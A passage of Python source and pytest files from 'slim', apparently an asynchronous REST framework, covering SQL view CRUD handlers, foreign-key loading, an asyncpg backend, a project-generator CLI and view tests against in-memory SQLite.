# table_map[column] = self.app.tables[tbl_name]
# 2. get query parameters
async def check(data, records):
for column, fkvalues_lst in data.items():
for fkvalues in fkvalues_lst:
pks = []
all_ni = True
vcls = self.app.tables[fkvalues['table']]
for i in records:
val = i.get(column, NotImplemented)
if val != NotImplemented:
all_ni = False
pks.append(val)
if all_ni:
logger.debug("load foreign key failed, do you have read permission to the column %r?" % column)
continue
# 3. query foreign keys
v = vcls(self.app, self._request) # fake view
await v._prepare()
info2 = SQLQueryInfo()
info2.set_select(ALL_COLUMNS)
info2.add_condition(PRIMARY_KEY, SQL_OP.IN, pks)
info2.bind(v)
# ability = vcls.permission.request_role(self.current_user, fkvalues['role'])
# info2.check_query_permission_full(self.current_user, fktable, ability)
try:
fk_records, count = await v._sql.select_page(info2, size=-1)
except RecordNotFound:
# 外键没有找到值,也许全部都是null,这很常见
continue
# if not fk_records: continue
await v.check_records_permission(info2, fk_records)
fk_dict = {}
for i in fk_records:
# 主键: 数据
fk_dict[i[vcls.primary_key]] = i
column_to_set = fkvalues.get('as', column) or column
for _, record in enumerate(records):
k = record.get(column, NotImplemented)
if k in fk_dict:
record[column_to_set] = fk_dict[k]
if fkvalues['loadfk']:
await check(fkvalues['loadfk'], fk_records)
await check(info.loadfk, records)
return records
async def _call_handle(self, func, *args):
""" call and check result of handle_query/read/insert/update """
await async_call(func, *args)
if self.is_finished:
raise FinishQuitException()
def _get_list_page_and_size(self) -> Tuple[int, int]:
page = self.route_info.get('page', '1').strip()
if not page.isdigit():
raise InvalidParams("`page` is not a number")
page = int(page)
client_size = self.route_info.get('size', '').strip()
if self.LIST_ACCEPT_SIZE_FROM_CLIENT and client_size:
page_size_limit = self.LIST_PAGE_SIZE_CLIENT_LIMIT or self.LIST_PAGE_SIZE
if client_size == '-1': # -1 means all
client_size = -1
elif client_size.isdigit(): # size >= 0
client_size = int(client_size)
if client_size == 0:
# use default value
client_size = page_size_limit
else:
if page_size_limit != -1:
client_size = min(client_size, page_size_limit)
else:
raise InvalidParams("`size` is not a number")
else:
client_size = self.LIST_PAGE_SIZE
return page, client_size
async def check_records_permission(self, info, records):
user = self.current_user if self.can_get_user else None
for record in records:
columns = record.set_info(info, self.ability, user)
if not columns: raise RecordNotFound(self.table_name)
await self._call_handle(self.after_read, records)
async def get(self):
with ErrorCatchContext(self):
info = SQLQueryInfo(self.params, view=self)
await self._call_handle(self.before_query, info)
record = await self._sql.select_one(info)
if record:
records = [record]
await self.check_records_permission(info, records)
data_dict = await self.load_fk(info, records)
self.finish(RETCODE.SUCCESS, data_dict[0])
else:
self.finish(RETCODE.NOT_FOUND)
async def list(self):
with ErrorCatchContext(self):
page, size = self._get_list_page_and_size()
info = SQLQueryInfo(self.params, view=self)
await self._call_handle(self.before_query, info)
records, count = await self._sql.select_page(info, size, page)
await self.check_records_permission(info, records)
if count:
if size == -1: size = count
pg = pagination_calc(count, size, page)
records = await self.load_fk(info, records)
pg["items"] = records
self.finish(RETCODE.SUCCESS, pg)
else:
self.finish(RETCODE.NOT_FOUND)
async def update(self):
with ErrorCatchContext(self):
info = SQLQueryInfo(self.params, self)
raw_post = await self.post_data()
values = SQLValuesToWrite(raw_post)
await self._call_handle(self.before_query, info)
record = await self._sql.select_one(info)
if record:
records = [record]
values.bind(self, A.WRITE, records)
await self._call_handle(self.before_update, raw_post, values, records)
logger.debug('update record(s): %s' % values)
new_records = await self._sql.update(records, values, returning=True)
await self.check_records_permission(None, new_records)
await self._call_handle(self.after_update, raw_post, values, records, new_records)
if values.returning:
self.finish(RETCODE.SUCCESS, new_records[0])
else:
self.finish(RETCODE.SUCCESS, len(new_records))
else:
self.finish(RETCODE.NOT_FOUND)
set = update
async def new(self):
with ErrorCatchContext(self):
raw_post = await self.post_data()
values = SQLValuesToWrite(raw_post, self, A.CREATE)
values_lst = [values]
logger.debug('insert record(s): %s' % values_lst)
# 注意,这里只给一个,new接口暂不支持一次insert多个
await self._call_handle(self.before_insert, raw_post, values)
records = await self._sql.insert(values_lst, returning=True)
await self.check_records_permission(None, records)
await self._call_handle(self.after_insert, raw_post, values_lst[0], records[0])
if values.returning:
self.finish(RETCODE.SUCCESS, records[0])
else:
self.finish(RETCODE.SUCCESS, len(records))
async def delete(self):
with ErrorCatchContext(self):
info = SQLQueryInfo(self.params, self)
await self._call_handle(self.before_query, info)
record = await self._sql.select_one(info)
if record:
records = [record]
user = self.current_user if self.can_get_user else None
logger.debug('request permission: [%s] of table %r' % (A.DELETE, self.table_name))
for record in records:
valid = self.ability.can_with_record(user, A.DELETE, record, available=record.keys())
if len(valid) == len(record.keys()):
logger.debug("request permission successed: %r" % list(record.keys()))
else:
logger.debug(
"request permission failed. valid / requested: %r, %r" % (valid, list(record.keys())))
return self.finish(RETCODE.PERMISSION_DENIED)
await self._call_handle(self.before_delete, records)
num = await self._sql.delete(records)
await self._call_handle(self.after_delete, records)
self.finish(RETCODE.SUCCESS, num)
else:
self.finish(RETCODE.NOT_FOUND)
@staticmethod
@abstractmethod
async def _fetch_fields(cls_or_self):
"""
4 values must be set up in this function:
1. cls.table_name: str
2. cls.primary_key: str
3. cls.fields: Dict['column', SQL_TYPE]
4. cls.foreign_keys: Dict['column', List[SQLForeignKey]]
:param cls_or_self:
:return:
"""
pass
async def before_query(self, info: SQLQueryInfo):
pass
async def after_read(self, records: List[DataRecord]):
"""
一对多,当有一个权限检查失败时即返回异常
:param records:
:return:
"""
pass
async def before_insert(self, raw_post: Dict, values: SQLValuesToWrite):
"""
一对一
:param raw_post:
:param values:
:return:
"""
pass
async def after_insert(self, raw_post: Dict, values: SQLValuesToWrite, record: DataRecord):
"""
一对一
Emitted before finish
:param raw_post:
:param values:
:param record:
:return:
"""
pass
async def before_update(self, raw_post: Dict, values: SQLValuesToWrite, records: List[DataRecord]):
"""
一对多,当有一个权限检查失败时即返回异常
raw_post 权限过滤和列过滤前,values 过滤后
:param raw_post:
:param values:
:param records:
:return:
"""
pass
async def after_update(self, raw_post: Dict, values: SQLValuesToWrite,
old_records: List[DataRecord], records: List[DataRecord]):
"""
:param old_records:
:param raw_post:
:param values:
:param records:
:return:
"""
async def before_delete(self, records: List[DataRecord]):
"""
:param records:
:return:
"""
pass
async def after_delete(self, deleted_records: List[DataRecord]):
"""
:param deleted_records:
:return:
"""
pass
@staticmethod
@abstractmethod
async def permission_valid_check(cls):
"""
To make sure current permission settings can fit with sql tables.
:param cls:
:return:
"""
pass
```
#### File: slim/slim_cli/main.py
```python
import os
import click
import base64
import shutil
from os.path import join
src_dir = os.path.dirname(os.path.abspath(__file__))
def gen(project_dir, project_name):
shutil.copytree(join(src_dir, 'template'), project_dir)
config_file = join(project_dir, 'config.py')
fp = open(config_file, encoding='utf-8')
txt = fp.read()
fp.close()
txt = txt.replace("PROJECT_NAME = 'SlimApplication'", "PROJECT_NAME = '%s'" % project_name.title())
txt = txt.replace(' = b"6aOO5ZC55LiN5pWj6ZW/5oGo77yM6Iqx5p+T5LiN6YCP5Lmh5oSB44CC"', ' = %r' % base64.b64encode(os.urandom(48)))
fp = open(config_file, 'w+', encoding='utf-8')
fp.write(txt)
fp.close()
return True
@click.group()
def cli():
pass
@cli.command(help='generate a new project from template')
@click.option('--name', prompt='Project Name', default=None)
def init(name):
click.echo('Start a web application.')
project_dir = name
if os.path.exists(project_dir):
print('Already Exists!')
return
if gen(project_dir, name):
print('OK!')
if __name__ == '__main__':
cli()
```
#### File: permissions/tables/_vars.py
```python
from model.user import POST_STATE
from slim.base.sqlquery import SQLQueryInfo, SQL_OP
from slim.base.permission import Ability
from permissions.roles import *
post_state_conditions = [
('state', '>', POST_STATE.DEL),
]
def add_post_visible_limit(table):
visitor.add_query_condition(table, post_state_conditions)
normal_user.add_query_condition(table, post_state_conditions)
```
#### File: support/asyncpg/view.py
```python
import binascii
from asyncpg import Record, Type
from ...base.permission import A, DataRecord, Permissions
from ...retcode import RETCODE
from ...support.asyncpg import query
from ...utils import to_bin, pagination_calc, dict_filter, bool_parse
from ...exception import SyntaxException
from ...base.view import AbstractSQLView, AbstractSQLFunctions, ViewOptions
# noinspection SqlDialectInspection,SqlNoDataSourceInspection
_field_query = '''SELECT a.attname as name, col_description(a.attrelid,a.attnum) as comment,
pg_type.typname as typename, a.attnotnull as notnull
FROM pg_class as c,pg_attribute as a inner join pg_type on pg_type.oid = a.atttypid
where c.relname = $1 and a.attrelid = c.oid and a.attnum>0;'''
_fk_query = '''
SELECT a.attname, c2.relname
FROM pg_class as c, pg_class as c2, pg_attribute as a,
pg_CONSTRAINT as con
WHERE c.oid = con.conrelid -- OID与表关联
and c.relname = $1 -- 查询当前表的OID
and con.confrelid = c2.oid -- 查询出关联的表名
and a.attrelid = c.oid -- 找到对应表的列的属性
and a.attnum=ANY(con.conkey); -- 外键位置与具体列对应
'''
class AsyncpgDataRecord(DataRecord):
# noinspection PyMissingConstructor
def __init__(self, table_name, val: Record):
self.table = table_name
self.val = val # 只是为了补全
def keys(self):
return self.val.keys()
def get(self, key):
return self.val['key']
def has(self, key):
return key in self.val
def to_dict(self, available_columns=None):
if available_columns:
return dict_filter(self.val, available_columns)
return dict(self.val)
class AsyncpgSQLFunctions(AbstractSQLFunctions):
def _get_args(self, args):
nargs = []
# 这里注意,args可能多次使用,不要修改其中内容
for i in args:
i = i[:]
field = self.vcls.fields[i[0]]
type_codec = field['typename']
# https://www.postgresql.org/docs/9.6/static/datatype.html
# asyncpg/protocol/protocol.pyx
# import asyncpg.protocol.protocol
conv_func = None
if type_codec in ['int2', 'int4', 'int8']:
type_codec = 'int'
conv_func = int
elif type_codec in ['float4', 'float8']:
type_codec = 'float'
conv_func = float
elif type_codec == 'bytea':
conv_func = to_bin
elif type_codec == 'bool':
conv_func = bool_parse
if conv_func:
try:
if i[1] == 'in':
i[2] = list(map(conv_func, i[2]))
else:
i[2] = conv_func(i[2])
except binascii.Error:
self.err = RETCODE.INVALID_PARAMS, 'Invalid query value for blob: Odd-length string'
return
except ValueError as e:
self.err = RETCODE.INVALID_PARAMS, ' '.join(map(str, e.args))
nargs.append([*i, type_codec])
return nargs
def _get_data(self, data):
ndata = {}
for k, v in data.items():
field = self.vcls.fields[k]
type_codec = field['typename']
if type_codec in ['int2', 'int4', 'int8']:
# type_codec = 'int'
v = int(v)
elif type_codec in ['float4', 'float8']:
# type_codec = 'float'
v = float(v)
elif type_codec == 'bytea':
# type_codec = 'bytea'
v = to_bin(v)
ndata[k] = v
return ndata
async def select_one(self, info):
view = self.vcls
nargs = self._get_args(info['conditions'])
if self.err: return self.err
sc = query.SelectCompiler()
sql = sc.select(info['select']).from_table(view.table_name).simple_where_many(nargs)\
.order_by_many(info['orders']).sql()
ret = await view.conn.fetchrow(sql[0], *sql[1])
if not ret: return RETCODE.NOT_FOUND, NotImplemented
if ret:
return RETCODE.SUCCESS, AsyncpgDataRecord(view.table_name, ret)
else:
return RETCODE.NOT_FOUND, NotImplemented
async def select_paginated_list(self, info, size, page):
nargs = self._get_args(info['conditions'])
if self.err: return self.err
sc = query.SelectCompiler()
sql = sc.select_count().from_table(self.vcls.table_name).simple_where_many(nargs)\
.order_by_many(info['orders']).sql()
count = (await self.vcls.conn.fetchrow(sql[0], *sql[1]))['count']
pg = pagination_calc(count, size, page)
if size == -1: size = count # get all
offset = size * (page - 1)
sc.reset()
sql = sc.select(info['select']).from_table(self.vcls.table_name).simple_where_many(nargs) \
.order_by_many(info['orders']).limit(size).offset(offset).sql()
ret = await self.vcls.conn.fetch(sql[0], *sql[1])
func = lambda item: AsyncpgDataRecord(self.vcls.table_name, item)
pg["items"] = list(map(func, ret))
return RETCODE.SUCCESS, pg
async def update(self, info, data):
view = self.vcls
nargs = self._get_args(info['conditions'])
if self.err: return self.err
columns = view.ability.can_with_columns(None, A.WRITE, view.table_name, data.keys())
if not columns:
return RETCODE.PERMISSION_DENIED, NotImplemented
ndata = self._get_data(dict_filter(data, columns))
uc = query.UpdateCompiler()
sql = uc.to_table(view.table_name).simple_where_many(nargs).set_values(ndata).sql()
ret = await view.conn.execute(sql[0], *sql[1]) # ret == "UPDATE X"
if ret and ret.startswith("UPDATE "):
num = int(ret[len("UPDATE "):])
return RETCODE.SUCCESS, {'count': num}
else:
return RETCODE.FAILED, NotImplemented
async def insert(self, data):
ndata = self._get_data(data)
ic = query.InsertCompiler()
sql = ic.into_table(self.vcls.table_name).set_values(ndata).returning().sql()
ret = await self.vcls.conn.fetchrow(sql[0], *sql[1])
return RETCODE.SUCCESS, AsyncpgDataRecord(self.vcls.table_name, ret)
class AsyncpgViewOptions(ViewOptions):
def __init__(self, *, list_page_size=20, list_accept_size_from_client=False, permission: Permissions = None,
conn=None, table_name: str=None):
self.conn = conn
self.table_name = table_name
super().__init__(list_page_size=list_page_size, list_accept_size_from_client=list_accept_size_from_client,
permission=permission)
def assign(self, obj: Type['AsyncpgView']):
if self.conn:
obj.conn = self.conn
if self.table_name:
obj.table_name = self.table_name
super().assign(obj)
class AsyncpgView(AbstractSQLView):
is_base_class = True
options_cls = AsyncpgViewOptions
conn = None
table_name = None
@classmethod
def cls_init(cls, check_options=True):
# py3.6: __init_subclass__
skip_check = False
if 'is_base_class' in cls.__dict__:
skip_check = getattr(cls, 'is_base_class')
if skip_check:
if not (cls.__name__ == 'AsyncpgView' and AbstractSQLView in cls.__bases__):
assert cls.conn, "%s.conn must be specified." % cls.__name__
assert cls.table_name, "%s.conn must be specified." % cls.__name__
AbstractSQLView.cls_init.__func__(cls, False)
# super().cls_init(False)
@staticmethod
async def _fetch_fields(cls_or_self):
if cls_or_self.table_name:
info = await cls_or_self.conn.fetch(_field_query, cls_or_self.table_name)
if not info:
raise SyntaxException("Table not found: %s" % cls_or_self.table_name)
ret = {}
for i in info:
ret[i['name']] = i
cls_or_self.fields = ret
info = await cls_or_self.conn.fetch(_fk_query, cls_or_self.table_name)
for i in info:
ret[i['attname']] = [i['relname']]
cls_or_self.foreign_keys = ret
@staticmethod
async def permission_valid_check(cls):
pass
```
#### File: slim/tests/test_peewee.py
```python
import json
import pytest
from unittest import mock
from aiohttp.test_utils import make_mocked_request
from multidict import MultiDict
from slim.base.user import BaseUserViewMixin
from slim.retcode import RETCODE
from slim.support.peewee import PeeweeView
from peewee import *
from slim import Application, ALL_PERMISSION
pytestmark = [pytest.mark.asyncio]
app = Application(cookies_secret=b'123456', permission=ALL_PERMISSION)
db = SqliteDatabase(":memory:")
class ATestModel(Model):
info = BlobField()
class Meta:
table_name = 'test'
database = db
@app.route('test')
class ATestView(PeeweeView):
model = ATestModel
db.create_tables([ATestModel])
async def test_post_blob():
request = make_mocked_request('POST', '/api/test', headers={},
protocol=mock.Mock(), app=app)
view = ATestView(app, request)
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.NOT_FOUND
request._post = dict(info='aabbcc')
view = ATestView(app, request)
await view._prepare()
await view.new()
assert view.ret_val['code'] == RETCODE.SUCCESS
request._post = dict(info='a') # 0x0A
view = ATestView(app, request)
await view._prepare()
await view.new()
assert view.ret_val['code'] == RETCODE.SUCCESS
view = ATestView(app, request)
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['info'] == b'\xaa\xbb\xcc'
request = make_mocked_request('POST', '/api/test',
headers={'content-type': 'application/json'},
protocol=mock.Mock(), app=app)
raw_json = json.dumps({'info': 'aabbcc'})
request._post = raw_json
request._read_bytes = bytes(raw_json, encoding='utf-8')
view = ATestView(app, request)
await view._prepare()
await view.new()
assert view.ret_val['code'] == RETCODE.SUCCESS
```
#### File: slim/tests/test_slim_permissions.py
```python
from slim.base.app import SlimPermissions
flag = 'TeSt.'
def test_slim_permissions():
o = SlimPermissions(flag)
assert o.aaa == flag
assert o['aaa'] == flag
o.aaa = '123'
assert o.aaa == '123'
assert o['aaa'] == '123'
```
#### File: slim/tests/test_sqlview.py
```python
import json
import pytest
from unittest import mock
from aiohttp.test_utils import make_mocked_request
from slim.retcode import RETCODE
from slim.support.peewee import PeeweeView
from peewee import *
from slim import Application, ALL_PERMISSION
from playhouse.sqlite_ext import JSONField as SQLITE_JSONField
from tests.tools import make_mocked_view_instance
pytestmark = [pytest.mark.asyncio]
app = Application(cookies_secret=b'123456', permission=ALL_PERMISSION)
db = SqliteDatabase(":memory:")
class ATestModel(Model):
name = TextField()
binary = BlobField()
count = IntegerField()
active = BooleanField(default=False)
flt = FloatField(default=0)
json = SQLITE_JSONField()
value = IntegerField(null=True)
class Meta:
table_name = 'test'
database = db
class ATestBModel(Model):
name = TextField()
link = ForeignKeyField(ATestModel)
class Meta:
table_name = 'test2'
database = db
class ATestCModel(Model):
name = TextField()
link = ForeignKeyField(ATestBModel)
class Meta:
table_name = 'test3'
database = db
class ATestDModel(Model):
name = TextField()
link = ForeignKeyField(ATestBModel, null=True)
class Meta:
table_name = 'test4'
database = db
db.create_tables([ATestModel, ATestBModel, ATestCModel, ATestDModel])
a1 = ATestModel.create(name='Name1', binary=b'test1', count=1, json={'q': 1, 'w1': 2})
a2 = ATestModel.create(name='Name2', binary=b'test2', count=2, json={'q': 1, 'w2': 2})
a3 = ATestModel.create(name='Name3', binary=b'test3', count=3, json={'q': 1, 'w3': 2})
a4 = ATestModel.create(name='Name4', binary=b'test4', count=4, json={'q': 1, 'w4': 2})
a5 = ATestModel.create(name='Name5', binary=b'test5', count=5, json={'q': 1, 'w5': 2})
b1 = ATestBModel.create(name='NameB1', link=a1)
b2 = ATestBModel.create(name='NameB2', link=a2)
b3 = ATestBModel.create(name='NameB3', link=a3)
b4 = ATestBModel.create(name='NameB4', link=a4)
b5 = ATestBModel.create(name='NameB5', link=a5)
c1 = ATestCModel.create(name='NameC1', link=b1)
c2 = ATestCModel.create(name='NameC2', link=b2)
c3 = ATestCModel.create(name='NameC3', link=b3)
c4 = ATestCModel.create(name='NameC4', link=b4)
c5 = ATestCModel.create(name='NameC5', link=b5)
ATestDModel.insert_many([
{'name': 'NameD1', 'link': None},
{'name': 'NameD2', 'link': None},
{'name': 'NameD3', 'link': None},
])
@app.route('test1')
class ATestView(PeeweeView):
model = ATestModel
@app.route('test2')
class ATestView2(PeeweeView):
model = ATestBModel
@app.route('test3')
class ATestView3(PeeweeView):
model = ATestCModel
@classmethod
def ready(cls):
cls.add_soft_foreign_key('id', 'wrong table name')
cls.add_soft_foreign_key('id', 'test2', 't2')
cls.add_soft_foreign_key('id', 'test', 't1')
@app.route('test4')
class ATestView4(PeeweeView):
model = ATestDModel
@classmethod
def ready(cls):
cls.add_soft_foreign_key('id', 'test')
async def test_bind():
request = make_mocked_request('GET', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
view = ATestView(app, request)
assert len(view.model._meta.fields) == len(view.fields)
assert set(view.model._meta.fields.values()) == set(view.model._meta.fields.values())
async def test_get():
# 1. success: no statement
request = make_mocked_request('GET', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
view = ATestView(app, request)
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
# 2. failed: simple statement and not found
request = make_mocked_request('GET', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
view = ATestView(app, request)
view._params_cache = {'name': '1'}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.NOT_FOUND
# 3. failed: column not found
request = make_mocked_request('GET', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
view = ATestView(app, request)
view._params_cache = {'qqq': 1}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.FAILED
# 4. failed: invalid parameter (Invalid operator)
request = make_mocked_request('GET', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
view = ATestView(app, request)
view._params_cache = {'qqq.a.b': 1}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.INVALID_PARAMS
# 5. failed: invalid parameter (bad value)
request = make_mocked_request('GET', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
view = ATestView(app, request)
view._params_cache = {'flt': 'qq'}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.INVALID_PARAMS
# 6. success: simple statement
request = make_mocked_request('GET', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
view = ATestView(app, request)
view._params_cache = {'flt': '0'}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
# 7. success: simple statement
request = make_mocked_request('GET', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
view = ATestView(app, request)
view._params_cache = {'flt.eq': '0'}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
# 8. not found: simple statement
request = make_mocked_request('GET', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
view = ATestView(app, request)
view._params_cache = {'flt.lt': '0'}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.NOT_FOUND
# 9. success: simple statement
request = make_mocked_request('GET', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
view = ATestView(app, request)
view._params_cache = {'flt.le': '0'}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
async def test_get_loadfk():
# 1. success: simple statement
request = make_mocked_request('GET', '/api/test2', headers={}, protocol=mock.Mock(), app=app)
view = ATestView2(app, request)
view._params_cache = {'name': 'NameB1'}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
# 2. invalid params: loadfk must be json string
view = await make_mocked_view_instance(app, ATestView2, 'GET', '/api/test2', {'name': 'NameB1', 'loadfk': {'aaa': None}})
await view.get()
assert view.ret_val['code'] == RETCODE.INVALID_PARAMS
# 3. failed: column not found
request = make_mocked_request('GET', '/api/test2', headers={}, protocol=mock.Mock(), app=app)
view = ATestView2(app, request)
view._params_cache = {'name': 'NameB1', 'loadfk': json.dumps({'aaa': None})}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.FAILED
# 4. success: simple load
request = make_mocked_request('GET', '/api/test2', headers={}, protocol=mock.Mock(), app=app)
view = ATestView2(app, request)
view._params_cache = {'name': 'NameB1', 'loadfk': json.dumps({'link_id': None})}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['link_id']['id'] == 1
assert view.ret_val['data']['link_id']['name'] == 'Name1'
# 5. success: load as
request = make_mocked_request('GET', '/api/test2', headers={}, protocol=mock.Mock(), app=app)
view = ATestView2(app, request)
view._params_cache = {'name': 'NameB1', 'loadfk': json.dumps({'link_id': {'as': 'link'}})}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['link']['id'] == 1
assert view.ret_val['data']['link']['name'] == 'Name1'
# 7. success: recursion load
request = make_mocked_request('GET', '/api/test3', headers={}, protocol=mock.Mock(), app=app)
view = ATestView3(app, request)
view._params_cache = {'name': 'NameC2', 'loadfk': json.dumps({'link_id': {'loadfk': {'link_id': None}}})}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['link_id']['id'] == 2
assert view.ret_val['data']['link_id']['name'] == 'NameB2'
assert view.ret_val['data']['link_id']['link_id']['id'] == 2
assert view.ret_val['data']['link_id']['link_id']['name'] == 'Name2'
assert view.ret_val['data']['link_id']['link_id']['count'] == 2
# 8. failed: load soft link, wrong table name
request = make_mocked_request('GET', '/api/test3', headers={}, protocol=mock.Mock(), app=app)
view = ATestView3(app, request)
view._params_cache = {'name': 'NameC1', 'loadfk': json.dumps({'id': None})}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.FAILED
# 9. failed: load soft link, wrong table name and wrong condition
request = make_mocked_request('GET', '/api/test3', headers={}, protocol=mock.Mock(), app=app)
view = ATestView3(app, request)
view._params_cache = {'name': 'not found', 'loadfk': json.dumps({'id': None})}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.FAILED
# 10. failed: foreign key not match table
request = make_mocked_request('GET', '/api/test3', headers={}, protocol=mock.Mock(), app=app)
view = ATestView3(app, request)
view._params_cache = {'name': 'NameC2', 'loadfk': json.dumps({'id': {'table': 'test1'}})}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.FAILED
# 11. success: soft foreign key
request = make_mocked_request('GET', '/api/test3', headers={}, protocol=mock.Mock(), app=app)
view = ATestView3(app, request)
view._params_cache = {'name': 'NameC2', 'loadfk': json.dumps({'id': {'table': 't2'}})}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['id']['id'] == 2
assert view.ret_val['data']['id']['name'] == 'NameB2'
# 12. success: soft foreign key as
request = make_mocked_request('GET', '/api/test3', headers={}, protocol=mock.Mock(), app=app)
view = ATestView3(app, request)
view._params_cache = {'name': 'NameC2', 'loadfk': json.dumps({'id': {'table': 't2', 'as': 't2'}})}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['id'] == 2
assert view.ret_val['data']['t2']['id'] == 2
assert view.ret_val['data']['t2']['name'] == 'NameB2'
# 13. success: list values
request = make_mocked_request('GET', '/api/test3', headers={}, protocol=mock.Mock(), app=app)
view = ATestView3(app, request)
view._params_cache = {'name': 'NameC2', 'loadfk': json.dumps({'id': [{'table': 't2', 'as': 't2'}]})}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['id'] == 2
assert view.ret_val['data']['t2']['id'] == 2
assert view.ret_val['data']['t2']['name'] == 'NameB2'
# 13. success: read multi tables with one key
request = make_mocked_request('GET', '/api/test3', headers={}, protocol=mock.Mock(), app=app)
view = ATestView3(app, request)
view._params_cache = {'name': 'NameC2', 'loadfk': json.dumps({'id': [{'table': 't2', 'as': 't2'}, {'table': 't1', 'as': 't1'}]})}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['id'] == 2
assert view.ret_val['data']['t2']['id'] == 2
assert view.ret_val['data']['t2']['name'] == 'NameB2'
assert view.ret_val['data']['t1']['name'] == 'Name2'
# 14. loadfk and all foreign keys are null
request = make_mocked_request('GET', '/api/test4/list/1', headers={}, protocol=mock.Mock(), app=app)
view = ATestView4(app, request)
view._params_cache = {'loadfk': json.dumps({'link_id': None})}
await view._prepare()
await view.list()
assert view.ret_val['code'] == RETCODE.NOT_FOUND
# 15. loadfk and all foreign keys are null
view = await make_mocked_view_instance(app, ATestView4, 'GET', '/api/test4/list/1',
{'loadfk': json.dumps({'link_id': None})})
await view.list()
assert view.ret_val['code'] == RETCODE.NOT_FOUND
async def test_new():
# 1. simple insert
request = make_mocked_request('POST', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
request._post = dict(name='Name6', binary=b'test6', count=1, json={'q': 1, 'w6': 2})
view = ATestView(app, request)
await view._prepare()
await view.new()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data'] == 1
# 2. insert and return records
request = make_mocked_request('POST', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
request._post = dict(name='Name6', binary=b'test6', count=1, json=json.dumps({'q': 1, 'w6': 2}))
request._post['returning'] = True
view = ATestView(app, request)
await view._prepare()
await view.new()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['name'] == 'Name6'
# 3. insert without necessary parameter
request = make_mocked_request('POST', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
request._post = dict(name='Name6',count=1)
view = ATestView(app, request)
await view._prepare()
await view.new()
assert view.ret_val['code'] == RETCODE.INVALID_POSTDATA
async def test_update():
a1 = ATestModel.create(name='Name1A', binary=b'test1A', count=1, json={'q': 1, 'w1a': 2})
a2 = ATestModel.create(name='Name2A', binary=b'test2A', count=2, json={'q': 1, 'w2a': 2})
a3 = ATestModel.create(name='Name3A', binary=b'test3A', count=3, json={'q': 1, 'w3a': 2})
# 1. simple update
request = make_mocked_request('POST', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
request._post = dict(name='Name1AA', count='4')
view = ATestView(app, request)
view._params_cache = {'name': 'Name1A'}
await view._prepare()
await view.update()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data'] == 1
val = ATestModel.get(ATestModel.binary==b'test1A')
assert val.name == 'Name1AA'
# 2. simple update with returning
request = make_mocked_request('POST', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
request._post = dict(name='Name2AA', count='5')
request._post['returning'] = True
view = ATestView(app, request)
view._params_cache = {'name': 'Name2A'}
await view._prepare()
await view.update()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['name'] == 'Name2AA'
# 3. incr
request = make_mocked_request('POST', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
request._post = {'count.incr': 1, 'returning': True}
view = ATestView(app, request)
view._params_cache = {'name': 'Name3A'}
await view._prepare()
await view.update()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['name'] == 'Name3A'
assert view.ret_val['data']['count'] == 4
# 3. incr -1
request = make_mocked_request('POST', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
request._post = {'count.incr': -2, 'returning': True}
view = ATestView(app, request)
view._params_cache = {'name': 'Name3A'}
await view._prepare()
await view.update()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['name'] == 'Name3A'
assert view.ret_val['data']['count'] == 2
async def test_is():
# 1. success: .eq null (sqlite)
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1', {'value': 'null'})
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
# 2. success: .ne null
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1', {'value.ne': 'null'})
await view.get()
assert view.ret_val['code'] == RETCODE.NOT_FOUND
# 3. success: .is null
